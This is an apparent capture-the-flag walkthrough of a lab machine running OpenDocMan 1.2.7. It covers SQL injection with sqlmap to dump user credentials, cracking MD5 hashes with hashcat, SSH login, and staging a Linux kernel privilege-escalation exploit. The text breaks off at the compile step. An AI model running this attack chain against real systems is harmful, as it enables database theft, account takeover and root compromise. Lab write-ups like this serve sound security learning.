• netdiscover
  • Nmap
  • Wfuzz
  • Nikto
  • sqlmap
  • hash-identifier


Use netdiscover to detect target IP address

netdiscover -i eth0 -r is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 -p-

port 22, 80 and 6667 are opening.

use wfuzz to scan. Nothing interesting.

use Niko to scan. Same.

Check the webpage, looks like a link may be useful.

Double click it.

Exam the links. In Document, I found this:

Looks like path /jabcd0cs/ is available.

go to, I found the app is OpenDocMan v1.2.7.

searchsploit opendocman

got the exploit. Try the sql injection vulnerability:

sqlmap -u "" --level=5 --risk=3

Now I know the database type is MySQL.

Next try to dump all table names

sqlmap -u "" --tables --dbms=mysql

looks like odm_user is the table I want to take a look at.

now dump columns from table odm_user

sqlmap -u "" -T odm_user --columns --dbms=mysql

looks like username and password

now time to dump all content from username and password,

sqlmap -u "" -C username,password --dump --dbms=mysql

use hash-identifier to detect hash type

looks like they are MD5.

use hashcat to crack it

hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

only guest’s password is cracked.

Find a very good website to crack MD5 online, get the cracked password webmin1980 for user webmin, and login:

not very helpful.

Try to ssh to the box using webmin

get the bash:

python -c 'import pty; pty.spawn("/bin/bash")'

first check the os version

uname -a

searchsploit 3.13.0

try this exploit

in Kali:

cp /usr/share/exploitdb/platforms/linux/local/37292.c /var/www/html/.
service apache2 restart

in target:

wget .
gcc 37292.c -o 37292